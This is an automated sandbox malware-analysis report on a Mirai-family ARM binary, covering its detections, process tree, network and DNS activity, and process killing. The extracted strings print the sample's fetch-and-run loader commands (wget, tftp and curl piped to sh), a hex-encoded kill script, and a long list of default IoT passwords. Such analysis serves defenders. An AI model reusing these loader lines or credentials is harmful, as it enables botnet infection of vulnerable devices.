Edit tour

Linux Analysis Report
arm7.elf

Overview

General Information

Sample name:	arm7.elf
Analysis ID:	1611345
MD5:	5a468969618a24b7a5f80ce520b59a62
SHA1:	28c46b16fe3b87b590407e0dd4d35df59c673423
SHA256:	97a1a2fb6691566e43950717ad5aa4459231c8a5f9fd53298064080b24ecd1ea
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	88
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Contains symbols with names commonly found in malware

Sample tries to kill multiple processes (SIGKILL)

Sends malformed DNS queries

Detected TCP or UDP traffic on non-standard ports

Executes the "rm" command used to delete files or directories

Found strings indicative of a multi-platform dropper

Sample and/or dropped files contains symbols with suspicious names

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings indicative of password brute-forcing capabilities

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1611345
Start date and time:	2025-02-10 20:07:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	arm7.elf
Detection:	MAL
Classification:	mal88.spre.troj.linELF@0/0@27/0

Runtime Messages

Command:	/tmp/arm7.elf
PID:	6231
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	The Peoples Bank of China.
Standard Error:

Process Tree

system is lnxubuntu20

arm7.elf (PID: 6231, Parent: 6156, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm7.elf

arm7.elf New Fork (PID: 6233, Parent: 6231)

arm7.elf New Fork (PID: 6235, Parent: 6233)

arm7.elf New Fork (PID: 6239, Parent: 6233)

arm7.elf New Fork (PID: 6240, Parent: 6233)

gdm3 New Fork (PID: 6265, Parent: 1320)

Default (PID: 6265, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

xfce4-session New Fork (PID: 6266, Parent: 1900)

gdm3 New Fork (PID: 6270, Parent: 1320)

Default (PID: 6270, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

xfce4-session New Fork (PID: 6271, Parent: 1900)

xfce4-session New Fork (PID: 6272, Parent: 1900)

rm (PID: 6272, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

xfce4-session New Fork (PID: 6273, Parent: 1900)

xfdesktop (PID: 6273, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542

xfce4-session New Fork (PID: 6275, Parent: 1900)

xfce4-panel (PID: 6275, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec

xfce4-session New Fork (PID: 6277, Parent: 1900)

xfce4-session New Fork (PID: 6278, Parent: 1900)

xfce4-session New Fork (PID: 6279, Parent: 1900)

xfce4-session New Fork (PID: 6280, Parent: 1900)

xfwm4 (PID: 6280, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c

xfce4-session New Fork (PID: 6282, Parent: 1900)

xfdesktop (PID: 6282, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542

xfce4-session New Fork (PID: 6284, Parent: 1900)

xfce4-panel (PID: 6284, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
arm7.elf	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
arm7.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
6235.1.00007f80e0017000.00007f80e0034000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6235.1.00007f80e0017000.00007f80e0034000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6231.1.00007f80e0017000.00007f80e0034000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6231.1.00007f80e0017000.00007f80e0034000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6239.1.00007f80e0017000.00007f80e0034000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6239.1.00007f80e0017000.00007f80e0034000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 1 entries

String: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4\2

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.93.89.106 ports 38241,1,2,3,4,8

Sends malformed DNS queries

Source: global traffic	DNS traffic detected: malformed DNS query: polizei.su. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: kittlez.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: qittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: cuttiecats.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: newkittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: gokittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: thekittler.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: kittlerer.ru. [malformed]

Source: global traffic

TCP traffic: 192.168.2.23:39716 -> 185.93.89.106:38241

Source: /tmp/arm7.elf (PID: 6231)

Socket: 127.0.0.1:39148

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 121.206.29.3
Source: unknown	TCP traffic detected without corresponding DNS query: 211.166.29.100
Source: unknown	TCP traffic detected without corresponding DNS query: 121.206.29.3
Source: unknown	TCP traffic detected without corresponding DNS query: 115.157.78.166
Source: unknown	TCP traffic detected without corresponding DNS query: 211.166.29.100
Source: unknown	TCP traffic detected without corresponding DNS query: 116.96.132.130
Source: unknown	TCP traffic detected without corresponding DNS query: 115.157.78.166
Source: unknown	TCP traffic detected without corresponding DNS query: 116.96.132.130
Source: unknown	TCP traffic detected without corresponding DNS query: 159.34.99.239
Source: unknown	TCP traffic detected without corresponding DNS query: 130.86.120.166
Source: unknown	TCP traffic detected without corresponding DNS query: 159.34.99.239
Source: unknown	TCP traffic detected without corresponding DNS query: 217.197.179.51
Source: unknown	TCP traffic detected without corresponding DNS query: 130.86.120.166
Source: unknown	TCP traffic detected without corresponding DNS query: 191.109.3.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.176.168.142
Source: unknown	TCP traffic detected without corresponding DNS query: 217.197.179.51
Source: unknown	TCP traffic detected without corresponding DNS query: 75.96.15.150
Source: unknown	TCP traffic detected without corresponding DNS query: 191.109.3.38
Source: unknown	TCP traffic detected without corresponding DNS query: 109.176.168.142
Source: unknown	TCP traffic detected without corresponding DNS query: 46.72.228.131
Source: unknown	TCP traffic detected without corresponding DNS query: 75.96.15.150
Source: unknown	TCP traffic detected without corresponding DNS query: 176.228.79.79
Source: unknown	TCP traffic detected without corresponding DNS query: 156.16.86.150
Source: unknown	TCP traffic detected without corresponding DNS query: 46.72.228.131
Source: unknown	TCP traffic detected without corresponding DNS query: 176.228.79.79
Source: unknown	TCP traffic detected without corresponding DNS query: 39.18.30.246
Source: unknown	TCP traffic detected without corresponding DNS query: 156.16.86.150
Source: unknown	TCP traffic detected without corresponding DNS query: 42.1.143.224
Source: unknown	TCP traffic detected without corresponding DNS query: 39.18.30.246
Source: unknown	TCP traffic detected without corresponding DNS query: 42.1.143.224
Source: unknown	TCP traffic detected without corresponding DNS query: 12.131.90.186
Source: unknown	TCP traffic detected without corresponding DNS query: 166.145.68.246
Source: unknown	TCP traffic detected without corresponding DNS query: 12.131.90.186
Source: unknown	TCP traffic detected without corresponding DNS query: 113.79.1.69
Source: unknown	TCP traffic detected without corresponding DNS query: 166.145.68.246
Source: unknown	TCP traffic detected without corresponding DNS query: 72.249.97.86
Source: unknown	TCP traffic detected without corresponding DNS query: 113.79.1.69
Source: unknown	TCP traffic detected without corresponding DNS query: 72.249.97.86
Source: unknown	TCP traffic detected without corresponding DNS query: 40.246.66.16
Source: unknown	TCP traffic detected without corresponding DNS query: 40.246.66.16
Source: unknown	TCP traffic detected without corresponding DNS query: 207.245.241.43
Source: unknown	TCP traffic detected without corresponding DNS query: 207.245.241.43
Source: unknown	TCP traffic detected without corresponding DNS query: 222.243.39.250
Source: unknown	TCP traffic detected without corresponding DNS query: 222.243.39.250
Source: unknown	TCP traffic detected without corresponding DNS query: 24.183.191.62
Source: unknown	TCP traffic detected without corresponding DNS query: 24.183.191.62
Source: unknown	TCP traffic detected without corresponding DNS query: 2.217.1.188
Source: unknown	TCP traffic detected without corresponding DNS query: 2.217.1.188
Source: unknown	TCP traffic detected without corresponding DNS query: 27.177.40.86
Source: unknown	TCP traffic detected without corresponding DNS query: 27.177.40.86

Source: global traffic	DNS traffic detected: DNS query: newkittler.ru
Source: global traffic	DNS traffic detected: DNS query: polizei.su. [malformed]
Source: global traffic	DNS traffic detected: DNS query: kittlez.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: qittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: cuttiecats.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: newkittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: gokittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: cuttiecats.ru
Source: global traffic	DNS traffic detected: DNS query: cats-master.ru
Source: global traffic	DNS traffic detected: DNS query: thekittler.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: kittlerer.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: cat-are-here.ru

Source: arm7.elf	String found in binary or memory: http:///curl.sh
Source: arm7.elf	String found in binary or memory: http:///wget.sh

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Contains symbols with names commonly found in malware

Source: ELF static info symbol of initial sample	Name: attack.c
Source: ELF static info symbol of initial sample	Name: attack_get_opt_int
Source: ELF static info symbol of initial sample	Name: attack_get_opt_ip
Source: ELF static info symbol of initial sample	Name: attack_gre.c
Source: ELF static info symbol of initial sample	Name: attack_gre_eth
Source: ELF static info symbol of initial sample	Name: attack_gre_ip
Source: ELF static info symbol of initial sample	Name: attack_init
Source: ELF static info symbol of initial sample	Name: attack_kill_all
Source: ELF static info symbol of initial sample	Name: attack_ongoing
Source: ELF static info symbol of initial sample	Name: attack_parse

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 904, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1576, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1900, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2028, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2050, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2062, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2063, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2069, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2123, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6217, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6235, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6239, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6266, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6271, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6272, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6273, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6274, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6275, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6276, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6277, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6278, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6279, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6280, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6281, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6282, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6283, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6284, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6285, result: successful	Jump to behavior

Source: arm7.elf	ELF static info symbol of initial sample: __gnu_unwind_execute
Source: arm7.elf	ELF static info symbol of initial sample: consume_password_resp

Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne >> > .d
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample	String containing 'busybox' found: /wget.sh -O- \| sh;/bin/busybox tftp -g
Source: Initial sample	String containing 'busybox' found: -r tftp.sh -l- \| sh;/bin/busybox ftpget
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
Source: Initial sample	String containing 'busybox' found: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- \| sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\

Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: admin1234
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: 654321

Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 904, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1576, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1900, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2028, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2050, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2062, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2063, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2069, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2123, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6217, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6235, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6239, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6266, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6271, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6272, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6273, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6274, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6275, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6276, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6277, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6278, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6279, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6280, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6281, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6282, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6283, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6284, result: successful	Jump to behavior
Source: /tmp/arm7.elf (PID: 6240)	SIGKILL sent: pid: 6285, result: successful	Jump to behavior

Source: classification engine

Classification label: mal88.spre.troj.linELF@0/0@27/0

Source: /usr/bin/xfce4-session (PID: 6272)

Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

Jump to behavior

Source: /tmp/arm7.elf (PID: 6231)

Queries kernel information via 'uname':

Jump to behavior

Source: arm7.elf	Binary or memory string: vmware
Source: arm7.elf, 6231.1.000055ad9ae5d000.000055ad9afae000.rw-.sdmp, arm7.elf, 6235.1.000055ad9ae5d000.000055ad9af8b000.rw-.sdmp, arm7.elf, 6239.1.000055ad9ae5d000.000055ad9af8b000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm7.elf	Binary or memory string: vmware123
Source: arm7.elf, 6231.1.000055ad9ae5d000.000055ad9afae000.rw-.sdmp, arm7.elf, 6235.1.000055ad9ae5d000.000055ad9af8b000.rw-.sdmp, arm7.elf, 6239.1.000055ad9ae5d000.000055ad9af8b000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: arm7.elf, 6231.1.00007ffee2d65000.00007ffee2d86000.rw-.sdmp, arm7.elf, 6235.1.00007ffee2d65000.00007ffee2d86000.rw-.sdmp, arm7.elf, 6239.1.00007ffee2d65000.00007ffee2d86000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: arm7.elf	Binary or memory string: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingonxc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpnobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetciscopass123sascottmotorolaROOT500zte9x15cisco123smcadmincsadmincolasoftadminadminsysmanagersysmanager888firewallsys123manager!1fw@2soc#3vpnAdmincyberauditsafetybasehillstonesupermantalenteyouusereyou_admineyougwadmin@(eyou)+-ccccccyouadmintelentadministratoradminpwdvenus70Auditadmlenovovenus60testadminerleadsec.wafauditadminer3100adminer3200adminer3260leadsec1234567root12345root123456root12345678root12345678987654321root1234567890ruleabc123huaweihuawei@1234telnetusertelnetpwdftpuserftppwdAdmin@123h3capadminh3cvenus.fwvenus.audituseradminvenus.userweboperwebauditconadminshell1q2w3e1q2w3e4rauditoroperatoradmin666admin12345admin123456weblogicROOTweblogic12311111111111test123synnettomcattomcat1231234qwerreecam4dettnetip400ho4uku6atPlcmSpIpchangemepa55w0rdpublicfivranneubntpassServ4EMCklv1234ahetzip8awind5885AdministratorbuhrooterCenturyL1nkankoivdevrealtekBGCVDSL2a